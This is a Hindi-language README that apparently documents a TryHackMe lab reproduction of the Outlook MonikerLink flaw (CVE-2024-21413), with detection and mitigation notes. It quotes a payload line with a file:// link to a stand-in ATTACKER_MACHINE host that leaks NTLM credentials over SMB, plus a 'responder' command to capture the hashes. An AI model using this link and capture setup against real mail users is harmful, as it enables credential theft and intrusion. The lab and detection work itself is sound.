
इस रिपॉजिटरी में CVE-2024-21413 के लिए शोध नोट्स और एक उच्च-स्तरीय proof-of-concept (PoC) शामिल है, जो संदेशों में एम्बेडेड SMB/moniker-शैली लिंक को संभालते समय कुछ मेल क्लाइंट्स में देखी गई एक कमजोरी है। यहां प्रलेखित PoC और प्रयोग सिस्टम पर एक नियंत्रित प्रयोगशाला वातावरण में किए गए थे।
यह प्रोजेक्ट मोनिकरलिंक व्यवहार (CVE-2024-21413) को पूरी तरह से पृथक TryHackMe वातावरण में पुन: उत्पन्न करता है ताकि यह दिखाया जा सके कि कुछ हाइपरलिंक प्रारूप आउटलुक को इस तरह से एक लिंक को प्रोसेस करने का कारण बन सकते हैं जो प्रमाणीकरण प्रयासों को लीक करता है या आगे शोषण की ओर ले जाता है। परिणाम एक PoC और प्राथमिकता वाले शमन और पहचान सुझावों का एक सेट है जिसे सुरक्षा टीमें लागू कर सकती हैं। कोई लाइव / अनधिकृत सिस्टम को लक्षित नहीं किया गया।
| उपकरण / कौशल | उद्देश्य |
|---|---|
| Python | स्क्रिप्ट विकास |
| Linux (Kali) | लक्ष्य प्रणाली |
| Metasploit | शोषण और पहुंच |
| TryHackMe Lab | नियंत्रित वातावरण |
यह कोड CMNatic द्वारा लिखा गया है और यहां पाया जा सकता है
उदाहरण के लिए, निम्न पंक्ति “<a href=“file://ATTACKER_MACHINE/test!” में, मैंने "ATTACKER_MACHINE" को अपनी आक्रमण मशीन के IP पते से बदल दिया और पंक्ति “server = smtplib.SMTP('MAILSERVER', 25)” में, मैंने "MAILSERVER" को अपनी पीड़ित मशीन के IP पते से बदल दिया।
responder -I ens5
systemctl start systemd-resolved

यह प्रूफ-ऑफ-कॉन्सेप्ट माइक्रोसॉफ्ट आउटलुक के लिंक हैंडलिंग में एक बारीकी को उजागर करता है: कुछ file://–शैली के मोनिकर लिंक जो SMB संसाधनों को संदर्भित करते हैं, आउटलुक की मानक फ़िल्टरिंग को दरकिनार कर सकते हैं और आउटबाउंड प्रमाणीकरण प्रयासों को उत्तेजित कर सकते हैं। यहां प्रदर्शित व्यवहार पूरी तरह से नियंत्रित TryHackMe प्रयोगशाला में पुन: उत्पन्न किया गया था और यह दर्शाता है कि कैसे प्रतीत होने वाले हानिरहित लिंक प्रारूप नेटवर्क इंटरैक्शन को छिपा सकते हैं। यद्यपि विक्रेता पैच और पहचान मार्गदर्शन जारी किए गए हैं, लेकिन अंतर्निहित यांत्रिकी मोनिकर/फ़ाइल योजना के वैध उपयोगों के कारण जटिल बनी हुई है। महत्वपूर्ण रूप से, इस PoC द्वारा उत्पन्न गतिविधि नेटवर्क स्तर पर देखने योग्य है (उदाहरण के लिए, NTLM प्रमाणीकरण प्रयासों को दिखाने वाले पैकेट कैप्चर में), जिससे यह फोरेंसिक विश्लेषण और घटना जांच के लिए उपयुक्त है।
Florian Roth द्वारा एक Yara नियम बनाया गया है जो :file:\: तत्व वाले ईमेल का पता लगाता है।
